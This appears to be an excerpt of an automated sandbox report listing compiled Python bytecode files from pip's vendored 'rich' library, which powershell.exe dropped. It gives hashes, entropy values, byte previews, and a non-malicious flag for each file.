                                                                                                    Category:dropped
                                                                                                    Size (bytes):10315
                                                                                                    Entropy (8bit):5.8107621793516575
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:D/nVwEqf1XObs1ssu3YdM0iKvbZ+G3lHnIEr0aPXxtqUIaiFBQ0ziv:RHqfcbqNdwKvbZZ1HnpPXxtqUIaiFBQF
                                                                                                    MD5:C293D6C2901BA4A17F47C7A625ECAAE0
                                                                                                    SHA1:179D98FB50BC41E9C611571D39545EB3F7651984
                                                                                                    SHA-256:844F59A718A9A77B8E3DA8AD837972ECBB67A4D41C98A03A2E2AD9E29E22B1E3
                                                                                                    SHA-512:F4890A81EA8EE9E7F87098807B5AD665042B5EAB5261DEF573C5213B69DBB7057EE2FCA682DBA561FDEC67E7023E9999D561D1D2884914F41561BB4373760459
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.!........................J.....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z.d.e.f.d...Z.e d.k(....r...e...e.jB..........................d...........Z"..e.........Z#..e.........Z$e"jK..................e#............e&..e.........e$z...d.z...d.........Z'..e.jB..........................e"_(..........e.........Z$e"jK..................e#............e&..e.........e$z...d.z...d.........Z)..e.d...........Z*e*jK..................e#............e%d.e'..d...............e%d.e)..d.............d.d.l+m,Z,....e.........Z"..e.jZ..................d...........Z.e.j_..................d.d.............e.j_..................d.. ..........e.ja..................d!d"..........e.ja..................d#d$............e.jb..................d%........Z2..e.jZ..................d&..........Z3e3j_............................e3j_..................d.. ..........
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7832
                                                                                                    Entropy (8bit):4.299952158594249
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:nTHBgOZguDnOVg1xfMzJJ9GtK0ZO05OgF:THV1tmqRZO05OgF
                                                                                                    MD5:130DB239248B512F819C55904E8CAB79
                                                                                                    SHA1:F293D8CDC5F56AC8BCC8DF5A46D0EE612EE95FAA
                                                                                                    SHA-256:7078B31206CB60C6FCBC9718A0529293F35B588A21CCE04AF55F4849BECA3714
                                                                                                    SHA-512:84F759E7F9A420CA5133301E22A5665147434F8F44B36185188A4827606C440D46155D16D898A23DC10762ED24723EC8966C8DB4F34626088B592A16FF56EB16
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cfp'..............................g.d...Z.y.).(....)......r....r....)................)..........r....).i....io...r....).i....i....r....).i....i....r....).....r....r....).i....i....r....).i....i....r....)......r....r....).i....i....r....).iK...i_...r....)..p...r....r....).i....i....r....).i....i....r....).i....i....r....).i....i....r....)......r....r....).i0...iJ...r....).i....i....r....).i....i....r....)......r....r....).i....i....r....).i....i#...r....).i%...i'...r....).i)...i-...r....).iY...i[...r....).i....i....r....).i....i....r....)..:...r....r....)..<...r....r....).iA...iH...r....)..M...r....r....).iQ...iW...r....).ib...ic...r....).....r....r....).....r....r....).i....i....r....)......r....r....).i....i....r....)......r....r....).i....i....r....)..<...r....r....).iA...iB...r....).iG...iH...r....).iK...iM...r....)..Q...r....r....).ip...iq...r....)..u...r....r....).i....i....r....).....r....r....).i....i....r....).i....i....r....)......r....r....).i....i....r....).i.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):205987
                                                                                                    Entropy (8bit):6.325638142123991
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:xcEbijcetPTCcs0yF5ebSDzaWQw+KHJNZ8Z+JJ8uSnYwfel7cmoOasBwsvVDP:9bh/cs0y8xAMuSnYceJcmoOasrj
                                                                                                    MD5:ADACF23D75555D89E5B7A9D1813605A2
                                                                                                    SHA1:7539A7D61471B3281A2FB333860A397A4D5C53C9
                                                                                                    SHA-256:4012A42694EDE20120D35423E1941962F50AAE578F7FAF917279E26374815261
                                                                                                    SHA-512:3F25AD073A62E2D7619E3DB28F29BCE704FF564F6EFABEED2CD4DE6E9F00FB76341B8459D96825196132A80188F448077EABF2AE85361F29D17E16891216E6D9
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.#........................J.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d!..i.d"d#..d$d%..d&d'..d(d)..d*d+..d,d-..d.d/..d0d1..d2d3..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC....i.dDdE..dFdG..dHdI..dJdK..dLdM..dNdO..dPdQ..dRdS..dTdU..dVdW..dXdY..dZd[..d\d]..d^d_..d`da..dbdc..ddde....i.dfdg..dhdi..djdk..dldm..dndo..dpdq..drds..dtdu..dvdw..dxdy..dzd{..d|d}..d~d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d...d.d...d.d...d.d...d.d...d.d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....i...d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1740
                                                                                                    Entropy (8bit):5.640656036274394
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:7IQUv8W1TlGcviLQP+LHzk3aYwEY7LTmTOYJElJOfDcgvDXqBuuxr:715bcviLhLHzkq6UXB7klzqouxr
                                                                                                    MD5:1AA8E905C685283D46DE3B0967EDD997
                                                                                                    SHA1:E663BC04EDB1A1E4C304F289C3A08C839ECA2D9D
                                                                                                    SHA-256:41F9222F7B5AD6994E613702E4084774F9367A2BC15FDA12A15C8C1BF55C4E5D
                                                                                                    SHA-512:2C3B74580832250024666855DA2F2923BAE68584563EDA7B1E41A37BEC11472EFB1BAA58E1E93885EA82EE2B6E8C2104EA4AA812A3B7B7ECDD1C16AC523FE26A
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf(..............................d.d.l.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z...e.e.....Z.e.e.g.e.f.....Z.e.e.e.g.e.f.....Z.d...e.j...................d.........j...................f.d.e.d.e.e.....d.e.d.e.f.d...Z.y.)......)...Callable..Match..OptionalN.....)...EMOJIz!(:(\S*?)(?:(?:\-)(emoji|text))?:)..text..default_variant.._emoji_sub..returnc................................t.........j.....................d.d.d...}.|.j.....................|.r.|.j...................|.d.........n.d...d.t.........t.............d.t.........f.......f.d...}...|.|.|.........S.).z.Replace emoji code in text.u.....u.....).r......emoji....matchr....c............................|.j...........................\...}.}.}.......|.j.......................................|...........z...S.#.t.........$.r...|.c.Y.S.w.x.Y.w.).N)...groups..lower..KeyError).r......emoji_code..emoji_name..variant..default_variant_code..get_emoji..get_variants.... ....kC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\sit
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2332
                                                                                                    Entropy (8bit):5.449969717124944
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:9lH1P9MVvs/qVsPqrCsFVs3pMTAlCHZaDvvXlQrRkR/:5UC0UqOaqpMclx7cg
                                                                                                    MD5:E8D3CCD26FA858F1281B8A451B627598
                                                                                                    SHA1:97D4B26FC2704AA19D57AB482866F952DC5A5675
                                                                                                    SHA-256:57781EBE09E52B61813C08C82D22F4AABDEA715C3E121A285435E91DF7F9ABF4
                                                                                                    SHA-512:408A427FDE79835B05A6ABD7AEE31B45373D9235D3AD7AF90B0647C88B946A0F9762410CC938151E76D335E78769D162ED73E347AF1959A6293FF90ADDECDF81
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf4...............................d.Z.d.Z.d.Z.d.Z.y.).a+...<!DOCTYPE html>.<head>.<meta charset="UTF-8">.<style>.{stylesheet}.body {{. color: {foreground};. background-color: {background};.}}.</style>.</head>.<html>.<body>. <pre style="font-family:Menlo,'DejaVu Sans Mono',consolas,'Courier New',monospace"><code>{code}</code></pre>.</body>.</html>.a....<svg class="rich-terminal" viewBox="0 0 {width} {height}" xmlns="http://www.w3.org/2000/svg">. Generated with Rich https://www.textualize.io -->. <style>.. @font-face {{. font-family: "Fira Code";. src: local("FiraCode-Regular"),. url("https://cdnjs.cloudflare.com/ajax/libs/firacode/6.2.0/woff2/FiraCode-Regular.woff2") format("woff2"),. url("https://cdnjs.cloudflare.com/ajax/libs/firacode/6.2.0/woff/FiraCode-Regular.woff") format("woff");. font-style: normal;. font-weight: 400;. }}. @font-face {{. font-family: "Fira Code";. src:
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):548
                                                                                                    Entropy (8bit):5.120846503976224
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:W7AIbTNcy3h7n7lPlO2afNLxyPxn8Dl/t+Imate36jpr22lBaolU/+tM:W7AIbhcyxN94NLxyJnyl/t+3ejprTlBg
                                                                                                    MD5:629D88C788FA5619D2D2CFA252D77750
                                                                                                    SHA1:B020D615662EFF155C1A8526CFE5EF032FEF9900
                                                                                                    SHA-256:E3E077F822EA4B42C4834508602C414E01A0B0A9B6B3474F04E8503E7AEC1307
                                                                                                    SHA-512:FE7427BE4DD8EA14F7E2CBDA1193D51C7B9D8C88C5F69920BA17615BAC7BEDB76ACA449B98E91153D71927651DEF0C8AE3FE7EDB114C7E7C94BCDA67C5ED88B1
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.......................... .....d.d.l.m.Z...d.e.d.d.f.d...Z.y.)......)...Any..ip..returnNc.....................8.....d.d.l.m.}...d.d.l.m.}.....|.............|...........y.).Nr....)...install)...pip._vendor.rich.prettyr......pip._vendor.rich.traceback).r....r......tr_installs.... .gC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/rich/_extension.py..load_ipython_extensionr........s......../..@....I....L.....)...typingr....r......r....r......<module>r........s..................s......t.....r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):866
                                                                                                    Entropy (8bit):5.52196429821806
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:AsrNDiFD4yq4dj94I89F3KvInHj+D7op99ol:LDyj9y7avw+D6994
                                                                                                    MD5:2EE6DBBE12B166EA197AA4BF4BA89384
                                                                                                    SHA1:6B2B1440DFBF7E8C4154858EABA56D27C9079B8B
                                                                                                    SHA-256:4000859810B44DEBED6DAF47F27043598A83B81BB2FFF95FBDD9C459FF6ACEE1
                                                                                                    SHA-512:531E64411FCAFBDB7D960470B0CC8207F558DAF0BDD920CAC2909EBBA9FFC0E583E3DB709F7A7CFCE56C0B7354E85EE1963C0840EA10BC7CD33087B51F3BD3C1
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................(.....d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d...Z.y.)......)...annotations)...IO..Callablec.....................P.....t.........|.d.d.........}.|.......|.........S.y.#.t.........$.r...Y.y.w.x.Y.w.).z.Get fileno() from a file, accounting for poorly implemented file-like objects... Args:. file_like (IO): A file-like object... Returns:. int | None: The result of fileno if available, or None if operation failed.. ..filenoN)...getattr..Exception)...file_liker....s.... .dC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/rich/_fileno.py..get_filenor........s?........(/.y.(.D.'I.F...............8.O...........................s..........%...%.N).r....z.IO[str]..returnz.int | None)...__future__r......typingr....r....r...........r......<module>r........s..........."........r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12088
                                                                                                    Entropy (8bit):5.609068695684242
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:FTCoZLjCqgdH6Hvz4ETrtOVwLvDSpX9pCBYhrGq6Pojc9g:FTXlgF6P75O6w9pHhrJtjc9g
                                                                                                    MD5:315CF3E328FD5B4A5F440208270D701E
                                                                                                    SHA1:9A6D5C63DF11AA6664E98030D8D0D9D3BEF6D815
                                                                                                    SHA-256:C0CCB296B8AB80BF7C52FD19DE09C2F2D92D1AA4ABFC22C1148175C5AAF38EC5
                                                                                                    SHA-512:673B537AD60793A7BFF77CDD7A0F615A8CF251DE703D0E7F3A2368F97ECAF35F3555DCA94AE5D8A24D37FE14FA1A2EF4809C270E88B9C4EF42873D1ACCCE2C5D
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.%........................D.....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!m"Z"..d.e#d.e#f.d...Z$..G.d...d.e.........Z%d.e.e&e.e.....f.....d.e.e'd.f.....f.d...Z(d.e&d.e.e#....f.d...Z)d.e&d.e.e#....d.e*f.d...Z+y.)......)...absolute_importN)...cleandoc..getdoc..getfile..isclass..ismodule..signature)...Any..Collection..Iterable..Optional..Tuple..Type..Union.....)...Group..RenderableType)...escape_control_codes)...ReprHighlighter)...JupyterMixin)...Panel)...Pretty)...Table)...Text..TextType..doc..returnc.....................0.....|.j...................d.........\...}.}.}.|.S.).z)Get the first paragraph from a docstring.z...)...partition).r......paragraph.._s.... .eC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/rich/_inspect.py.._first_paragraphr#.......s..........m.m.F..+.O.I.q.!...........c.......
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4158
                                                                                                    Entropy (8bit):5.417697372493911
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:04Sxzs4zqUGMUNLzDEQGX83o9FpT1Qh8jlHf5cCt:04SRnsLzD73orch8hGCt
                                                                                                    MD5:3DA5F8CB83CB889E350B515921860C84
                                                                                                    SHA1:7DA06F80C49A0F67281E42068772531E68665D92
                                                                                                    SHA-256:38738E21AD77A953E25B4B0B98840F894B80A1133711407961D0DFE1C93D9E13
                                                                                                    SHA-512:0FC2DCE0EDE76249085D645AB4B88891F0DC093BD3A311C4DB3BA3DDEB7EAF33C64417243944C14BB47CC7AC74B5B68E05EBC0CFA0395809AB8AE159DAB20FAE
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...e.r.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...e.e.g.e.f.....Z...G.d...d.........Z.e.d.k(..r4d.d.l.m.Z.....e.........Z.e.j-..................d.d.............e.j/..................d.d.............y.y.)......)...datetime)...Iterable..List..Optional..TYPE_CHECKING..Union..Callable.....)...Text..TextType)...Console..ConsoleRenderable..RenderableType....Tablec..........................e.Z.d.Z.............d.d.e.d.e.d.e.d.e.e.e.f.....d.e.d.e.e.....d.d.f.d...Z.............d.d.d.d.e.d.....d.e.e.....d.e.e.e.e.f.........d.e.d.e.e.....d.e.e.....d.e.e.....d.d.f.d...Z.y.)...LogRender..show_time..show_level..show_path..time_format..omit_repeated_times..level_width..returnNc.....................f.....|.|._.........|.|._.........|.|._.........|.|._.........|.|._.........|.|._.........d.|._.........y.).N).r....r....r....r....r....r......_last_time)...selfr....r....r....r....r....r....s.... .hC:\Users\boad
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1896
                                                                                                    Entropy (8bit):5.719213163982432
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:799RFf1CFJ4bPxVuKFkQY+IWrC71Mziluu:RXCUbv6WS1d
                                                                                                    MD5:B8F2A8AB6540049546A873408A72DE9F
                                                                                                    SHA1:72E0BF54779FC40F91C560CC0C8EC43E4E3FC458
                                                                                                    SHA-256:D2756B3FFA57179B1BF9EB8B1C619336D01CA972D7E8EA508CC02784AAC2FE48
                                                                                                    SHA-512:964FE3889F62FB783E9D015FEA45E0B976354E79E90FDB68C7D7B5084DA9CD9DEA808E7B70349DAEA9429274509084BA895A89223A5D8B51F00FF99C88E3E44D
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.d.l.m.Z.m.Z.m.Z.....e.d.........Z.d.e.e.....d.e.e.e.e.f.........f.d...Z.d.e.e.....d.e.e.e.e.f.........f.d...Z.d.e.e.....d.e.e.e.e.e.f.........f.d...Z.y.)......)...Iterable..Tuple..TypeVar..T..values..returnc................#....~...K.....t.........|.........}...t.........|.........}.d.|.f.......|.D.]...}.d.|.f...........y.#.t.........$.r...Y.y.w.x.Y.w...w.).z9Iterate and generate a tuple with a flag for first value.NTF....iter..next..StopIteration).r......iter_values..values.... .bC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/rich/_loop.py..loop_firstr........sV............v.,.K.........[..!..........+.................U.l............................s......=.......=...:...=...:...=.c................#.......K.....t.........|.........}...t.........|.........}.|.D.]...}.d.|.f.......|.}.....d.|.f.......y.#.t.........$.r...Y.y.w.x.Y.w...w.).z8Iterate and generate a tuple with a flag for last value.NFTr...
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3631
                                                                                                    Entropy (8bit):4.881734721428404
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:jW5IALNJTBGP3VDf0uM3smPn9AEpoJvITv0SwqnD5IxL:jm/JJTBk0j8uUJQTv0SwqdyL
                                                                                                    MD5:94EDD0A61C363B80B3ED111DEF420ECA
                                                                                                    SHA1:766921AF7D6EFB3642C65E459A4A2A28F436EBFF
                                                                                                    SHA-256:2058EDA95627CB26DDBC740359A210CB7C313666BBDC20B0B822188802DBA3DE
                                                                                                    SHA-512:CB8528FF63B951724274306434154974DD0EA40CBCADFEAF0E1F30542296A80FBE08C02EE6DECBBE5334C4AB643508997F8317F771FD672C1192B7FC9F4F1275
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cfk.........................Z.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....G.d...d.e.e.............Z...e.........Z.y.)......)...TracebackType)...IO..Iterable..Iterator..List..Optional..Typec.....................T.....e.Z.d.Z.d!d...Z.d.e.f.d...Z.d"d.e.d.e.f.d...Z.d.e.f.d...Z.d"d.e.d.e.f.d...Z.d"d.e.d.e.e.....f.d...Z.d"d.e.d.e.d.e.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.d"d.e.e.....d.e.f.d...Z.d.e.f.d...Z.d.e.e.....d.d.f.d...Z.d.e.f.d...Z.d.e.e.....f.d...Z.d.e.e.....f.d...Z.d.e.e.e.........d.e.e.....d.e.e.....d.d.f.d...Z.d.e.d.e.f.d...Z.d!d...Z.d.e.f.d ..Z y.)#..NullFile..returnNc...........................y...N......selfs.... .gC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/rich/_null_file.py..closez.NullFile.close...................c...........................y...NFr....r....s.... r......isattyz.NullFile.isatty..............r......_NullFile__nc...........................y...N..r....).r....r....s.... r......readz.NullFile.read..............r
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5171
                                                                                                    Entropy (8bit):3.097526007459697
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:0kglv4dKLAy5SUrCFyVV9Rzf3tV9mvu10r62KLUVOPwRULOVv8pi3AQo/IBAvKL4:UAICFOFNSLsFuXWT7vNyfq9wyUU
                                                                                                    MD5:C1576A595F61E59B791B06846A3CCA53
                                                                                                    SHA1:5AB236A0A61F7BAD5B7F5491942CCA582ADFC4C7
                                                                                                    SHA-256:475126D4C0954B40F522A35247458B291BD92F067BEE7A54EB0BCE39A5C22B3A
                                                                                                    SHA-512:DCCA2191B8833C71850AA45FB8525A62CC2C9074285D45EDEBAEF115F1ABADEC6742D35EB205EB7D5448522C71086840249037F846DE31ADCC47C576C91F7C57
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................L.....d.d.l.m.Z.....e.g.d...........Z...e.g.d...........Z...e.g.d...........Z.y.)......)...Palette).)......r....r....)................)...............)...............).r.....7........)..............)..:............)......r....r.......v...r....r....).......H....V...)...........r....)...............)..;....x........).....r........)..a........r'...)......r(...r(...)...r....r....r....).....r....r....).r....r*...r....).r*....U...r....).r....r....r*...).r*...r....r*...).r....r*...r*...).r*...r*...r*...).r+...r+...r+...).r#...r+...r+...).r+...r#...r+...).r#...r#...r+...).r+...r+...r#...).r#...r+...r#...).r+...r#...r#.....r#...r#...r#...(....r)...).....r....r....).r....r-...r....).r-...r-...r....).r....r....r-...).r-...r....r-...).r....r-...r-...)......r....r......r-...r-...r-.....r#...r....r......r....r#...r......r#...r#...r......r....r....r#.....r#...r....r#.....r....r#...r#...r,...r)...).r....r....._...).r....r........).r....r........).r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):737
                                                                                                    Entropy (8bit):5.45907559712737
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:8IlX2c7KaFllpnYHc+/FHYfCSFjx1XWnqUImajuKlTstIAZp1dJ2lLL6hxS:08KaNJYxt4bjfWnqU3mTsiAlmlLL6DS
                                                                                                    MD5:810D89DB5DAC2595200B8FFAC2D1B8BF
                                                                                                    SHA1:8F55984AC21AE9750E7EDED2E885A5B313711C5A
                                                                                                    SHA-256:7D763E7A6C68C9D8D80874230CCF70127FF60A8B0F930C618E7E98AABB577DDA
                                                                                                    SHA-512:1D3D1A39018FB54599590399FAE5394B7731F8F12BCB7CF0EEBBD9B84B3CDDAB2A34D153FAF9F7AC5CA9E7CD46311948AA1CFAD0D383B290351538F99961359F
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................&.....d.d.l.m.Z...d.e.e.....d.e.f.d...Z.y.)......)...Optional..values..returnc.....................D.....|.s.J.d...........|.D.]...}.|.....|.c...S...t...................S.).z.Pick the first non-none bool or return the last value... Args:. *values (bool): Any number of boolean or None values... Returns:. bool: First non-none boolean.. z.1 or more values required)...bool).r......values.... .bC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/rich/_pick.py..pick_boolr........s8....................6....................L.............;........N)...typingr....r....r......r....r......<module>r........s..................x...~......$.....r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6590
                                                                                                    Entropy (8bit):5.779792728155835
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:JTjfLZ+tBZfFh0pkep6PKbZp44G1H5FnFNH5ZD9h9NdubvHXJYBjjJ:JrL6BZQpVWWaHTF1NpsbcXJ
                                                                                                    MD5:20C25A1F0D123949BAE929AD0C16EC9C
                                                                                                    SHA1:03F1F8A0E367C92268CF3B9A1F4250BD6D5E7EFA
                                                                                                    SHA-256:5A00A4FD30107491250332AB23A9E22985E6D50C89E665FC30F8FD896EB1E221
                                                                                                    SHA-512:4659F14DA20EAAA58E9ED7307FD7EAC9D7C8E548A8BD4ADFD93E9E74840AD79F4E7509FE178A61AC98CD4F008A6784AA1CE848C9369CCFC4D6AFCBC222CD29B6
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf`..............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.j...................d.k\..r.d.d.l.m.Z...n.d.d.l.m.Z.....G.d...d.e.........Z.d.e.d.e.e.....d.e.e.....f.d...Z.d.e.d.e.e.....d.e.e.....d.e.e.....d.e.e.....f.d...Z...d.d.e.d.e.e.....d.e.e.e.........d.e.e.....f.d...Z.e.d.k(..rHd.d.l.m.Z...e...G.d...d.................Z...e.d...e.d.d.d...........e.d.d.d...........e.d.d.d.........g.........Z...e...e.e...................y.y.)......N)...Fraction)...ceil)...cast..List..Optional..Sequence)...........)...Protocolc.....................B.....e.Z.d.Z.U.d.Z.d.Z.e.e.....e.d.<...d.Z.e.e.d.<...d.Z.e.e.d.<...y.)...Edgez1Any object that defines an edge (such as Layout).N..size.......ratio..minimum_size)...__name__..__module__..__qualname__..__doc__r....r......int..__annotations__r....r............cC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/rich/_ratio.pyr....r........s&.......;....D.(.3.-.......E.3.N....L.#...r....r
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13190
                                                                                                    Entropy (8bit):5.80689642778203
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:7OMXUQHdqVJqsyPdtF7nuSn3nXnNYWCheeY+3DjWTJOPt96NTrrSxUHIPFeLSt:C54qrqsMKqyI+3DjWTgPt9GTrmxnPA+t
                                                                                                    MD5:25420305DDE793148EC15E5429229E89
                                                                                                    SHA1:BFFC11BB8D47671D15D1D78BB796DB4261A61B46
                                                                                                    SHA-256:247438A5A1C1073194167575C8399A67825F52F59EF43164CD99AED9A22D68C5
                                                                                                    SHA-512:0E02E826C0BF1C315DE57B4CBDE1E42D37E256776574603A4FEC9A9FBCFEFD023373B48C7BE0FC7F5F0E43C37A12EC00745A4186F9F7EDA8D0F775055AC1DD6A
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.M..............................d.Z.i.d.d.d.d.....d.d.d.d.....d.d.d.d.....d.d.d.d.....d.d.d.d.....d.d.d.d.....d.d.d.d.....d.d.d.d.....d.d.d.d.....d.d.d.d.....d.d.d.d.....d.d.g.d...d.....d.d.d.d.....d.d.g.d ..d.....d!d.d"d.....d#d.d$d.....d%d&g.d'..d.....i.d(d)g.d*..d.....d+d,d-d.....d.d.d/d.....d0d,d1d.....d2d.d3d.....d4d5d6d.....d7d5d8d.....d9d:d;d.....d<d5d=d.....d>d.d?d.....d@d5dAd.....dBd5dCd.....dDd.dEd.....dFdGdHd.....dId.dJd.....dKd5dLd.....dMdNdOd.......i.dPd5dQd.....dRdGdSd.....dTd.dUd.....dVdWdXd.....dYd.dZd.....d[d5d\d.....d]d.d^d.....d_d.d`d.....dadbdcd.....ddd.ded.....dfd.dgd.....dhd.did.....djd.dkd.....dldGdmd.....dnd5dod.....dpd.dqd.....drd.dsd.......i.dtd.g.du..d.....dvd5g.dw..d.....dxd.g.dy..d.....dzd.g.d{..d.....d|d)d}d~g.d.....d.dbg.d...d.....d.d.g.d...d.....d.d.g.d...d.....d.dNg.d...d.....d.d.g.d...d.....d.d.g.d...d.....d.d:d.d.g.d.....d.d.g.d...d.....d.d5g.d...d.....d.d.d.d.....d.d.g.d...d.....d.d&d.d.......d.g.d...d...d.g.d...d...d.d.d...d.g.d...d...d.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):976
                                                                                                    Entropy (8bit):5.178493529577844
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:D+6Y8neuLk30nOEGd73VErmR5/ppJ/lJO+y/Vf:DQzEnOEGVE85/nJ/7kVf
                                                                                                    MD5:181A18BBAAF660E106FF0E6D8C1E4F8B
                                                                                                    SHA1:52BBE8236D22446D58AD49380403147B916D86D9
                                                                                                    SHA-256:A48F9C7591D48B0BCAE25F53BAA1495AD1B71DF8BEB2F02E4E11448467227495
                                                                                                    SHA-512:2BA4A3E396C6DC692B38C8EE675AD5A14D62F05BC700B89DC0ED99082047EFCEDAF5B6826EE2DF4508F5EA95039BB5B102F97DCDCFE19CEB3FAF35271CCDDF8C
                                                                                                    Malicious:false
